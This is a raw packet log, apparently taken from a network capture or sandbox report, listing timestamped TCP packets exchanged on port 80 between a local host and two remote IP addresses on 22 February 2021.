Feb 22, 2021 09:14:34.682667971 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.682692051 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.682693958 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.682720900 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.682729006 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.683428049 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.683454990 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.683484077 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.683514118 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.683538914 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.683549881 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.683640957 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.684245110 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.684273005 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.684299946 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.684322119 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.684329033 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.684356928 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.684379101 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.686342955 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.686374903 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.686404943 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.686431885 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.686434984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.686458111 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.686465025 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.686507940 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.687875986 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.687905073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.687957048 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.689274073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.689307928 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.689337015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.689368010 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.689371109 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.689439058 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.689949989 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.689980984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.690002918 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.690049887 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.691128016 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.691591978 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.691625118 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.691652060 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.691656113 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.691677094 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.691704988 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.691709042 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.691751003 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.692022085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.692051888 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.692078114 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.692102909 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.692596912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.692625046 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.692656994 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.692675114 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.692688942 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.692714930 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.692740917 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.692755938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.692760944 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.693490982 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.693522930 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.693548918 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.693572998 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.693577051 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.693603992 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.693612099 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.693631887 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.693645000 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.695230961 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695262909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695291042 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695317984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695333004 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.695344925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695369959 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.695372105 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695389032 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.695404053 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695430040 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695460081 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695477962 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.695492983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695508003 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.695523024 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695553064 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.695593119 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.696377993 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.696410894 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.696441889 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.696470022 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.696472883 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.696499109 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.696505070 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.696531057 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.696574926 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.697335958 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.697377920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.697405100 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.697423935 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.697449923 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.697475910 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.697501898 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.697515965 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.697546005 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.698523045 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.698564053 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.698595047 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.698625088 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.698631048 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.698645115 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.698664904 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.698692083 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.698713064 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.699316025 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.699352026 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.699383020 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.699409962 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.699414015 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.699435949 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.699460983 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.699462891 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.699486017 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.700246096 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.700279951 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.700306892 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.700314999 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.700334072 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.700359106 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.700362921 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.700392962 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.700455904 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.701167107 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.701209068 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.701240063 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.701271057 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.701302052 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.701334953 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.701543093 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.702105999 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.702142000 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.702168941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.702195883 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.702215910 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.702222109 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.702230930 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.702256918 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.702280045 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.703062057 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.703103065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.703128099 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.703131914 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.703160048 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.703186989 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.703207016 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.703216076 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.703238964 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.704042912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.704076052 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.704108000 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.704138994 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.704145908 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.704168081 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.704170942 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.704200983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.704222918 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.704898119 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.704929113 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.704957962 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.704988003 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.705003977 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.705018997 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.705032110 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.705049038 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.705075979 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.705810070 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.705848932 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.705879927 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.705898046 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.705920935 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.705928087 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.705952883 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.705984116 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.706001043 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.706747055 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.706788063 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.706818104 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.706849098 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.706860065 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.706880093 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.706907988 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.706909895 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.706926107 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.707658052 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.707698107 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.707727909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.707736969 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.707757950 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.707781076 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.707791090 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.707820892 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.707834959 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.708527088 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.708583117 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.708600998 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.708631039 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.708662033 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.708679914 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.708692074 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.708723068 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.708745956 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.709357977 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.709408045 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.709427118 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.709439993 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.709469080 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.709491968 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.709494114 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.709531069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.709546089 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.710243940 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.710278988 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.710305929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.710331917 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.710347891 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.710361958 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.710371017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.710401058 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.710424900 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.711102962 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.711133003 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.711159945 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.711186886 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.711191893 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.711213112 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.711220026 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.711239100 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.711263895 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.711952925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.711985111 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712012053 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712028980 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.712039948 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712059975 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.712068081 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712094069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712138891 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.712793112 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712827921 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712858915 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712888956 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712903023 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.712912083 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.712920904 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712953091 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.712997913 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.713651896 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.713680029 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.713706970 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.713732004 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.713752031 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.713758945 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.713778973 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.713788986 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.713812113 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.713814020 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.713880062 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.806271076 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:34.990715027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.990767956 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.990797997 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.990844965 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.023736954 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.023787022 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.023817062 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.023844957 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.023870945 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.023897886 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.023910046 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.023926973 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.023951054 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.023957968 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.023983002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024007082 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024008989 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.024033070 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024034023 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.024060011 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024071932 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.024086952 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024111986 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024137020 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.024137974 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024163008 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024183989 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.024188042 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024213076 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024240971 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024257898 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.024267912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024292946 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024306059 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.024318933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024333000 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.024348974 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024374008 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024395943 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.024396896 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024431944 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.024869919 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024910927 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024939060 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024972916 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.024998903 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025010109 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025026083 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025041103 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025053978 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025068998 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025083065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025109053 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025130987 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025135040 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025162935 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025182962 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025191069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025218964 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025248051 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025264978 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025279045 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025307894 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025612116 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025651932 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025684118 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025712013 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025723934 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025738001 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025763035 CET	80	49761	172.67.172.17	192.168.2.4
